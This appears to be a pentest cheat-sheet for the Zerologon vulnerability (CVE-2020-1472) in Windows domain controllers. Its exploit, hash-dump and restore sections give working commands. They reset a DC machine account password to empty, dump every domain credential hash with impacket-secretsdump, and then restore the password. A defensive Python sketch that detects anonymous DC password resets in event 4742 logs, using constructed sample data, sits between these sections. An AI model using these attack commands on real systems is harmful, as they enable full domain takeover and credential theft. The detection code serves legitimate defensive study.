# Zerologon exploit (CVE-2020-1472)

## Information

This exploit sets the domain controller's machine account password to an empty string.

* [SecuraBV/CVE-2020-1472/zerologon\_tester.py](https://github.com/SecuraBV/CVE-2020-1472/blob/master/zerologon_tester.py)
* `python3 zerologon_tester.py DOMAIN DC_IP`
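
A detection sketch for the password change described above, added here as an example and not taken from either linked repository. It assumes the reset is logged on the DC as Security event 4742 (computer account changed) with ANONYMOUS LOGON (`S-1-5-7`) as the subject and a new `PasswordLastSet` value, which is a commonly used indicator for this CVE. The host names, timestamps and trimmed-down event records are constructed sample data.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
ANONYMOUS_SID = "S-1-5-7"  # well-known SID of ANONYMOUS LOGON


def make_event(event_id, subject_sid, target, pwd_last_set):
    """Build a trimmed-down Security event record (constructed sample data)."""
    return (
        f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
        "<Computer>dc01.example.test</Computer></System><EventData>"
        f'<Data Name="TargetUserName">{target}</Data>'
        f'<Data Name="SubjectUserSid">{subject_sid}</Data>'
        f'<Data Name="PasswordLastSet">{pwd_last_set}</Data>'
        "</EventData></Event>"
    )


# Constructed samples: only the first one should raise an alert.
SAMPLE_EVENTS = [
    make_event(4742, "S-1-5-7", "DC01$", "9/18/2020 10:15:42 AM"),   # anonymous reset of a DC account
    make_event(4742, "S-1-5-18", "DC01$", "9/18/2020 11:02:10 AM"),  # non-anonymous subject
    make_event(4742, "S-1-5-7", "DC01$", "-"),                       # password attribute untouched
    make_event(4742, "S-1-5-7", "WS07$", "9/18/2020 11:30:00 AM"),   # not in the DC list
]


def anonymous_dc_password_resets(events_xml, dc_accounts):
    """Return (computer, account, PasswordLastSet) for every 4742 event in which
    ANONYMOUS LOGON changed the password of one of the listed DC machine accounts."""
    dcs = {name.lower() for name in dc_accounts}
    hits = []
    for raw in events_xml:
        root = ET.fromstring(raw)
        if root.findtext("e:System/e:EventID", namespaces=NS) != "4742":
            continue
        data = {d.get("Name"): (d.text or "") for d in root.iterfind("e:EventData/e:Data", NS)}
        if (data.get("TargetUserName", "").lower() in dcs
                and data.get("SubjectUserSid") == ANONYMOUS_SID
                and data.get("PasswordLastSet", "-") != "-"):
            hits.append((root.findtext("e:System/e:Computer", namespaces=NS),
                         data["TargetUserName"], data["PasswordLastSet"]))
    return hits


if __name__ == "__main__":
    for hit in anonymous_dc_password_resets(SAMPLE_EVENTS, ["DC01$"]):
        print("ALERT anonymous DC password reset:", hit)
```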

## Exploit

1. Clone [dirkjanm/CVE-2020-1472](https://github.com/dirkjanm/CVE-2020-1472)
2. `python3 exploit.py DOMAIN DC_IP`

### Dump hashes

* `impacket-secretsdump -just-dc DOMAIN/DC_HOSTNAME\$@DC_IP -no-pass`

### Restore

1. `impacket-secretsdump administrator@DC_IP -hashes HASH_FROM_DUMP`
2. Note the `plain_password_hex` value in the output (the hex-encoded plaintext password); it is the `PLAIN_HEX` argument in the next step
3. `python3 restorepassword.py DOMAIN/DC_HOSTNAME@DC_HOSTNAME -target-ip DC_IP -hexpass PLAIN_HEX`
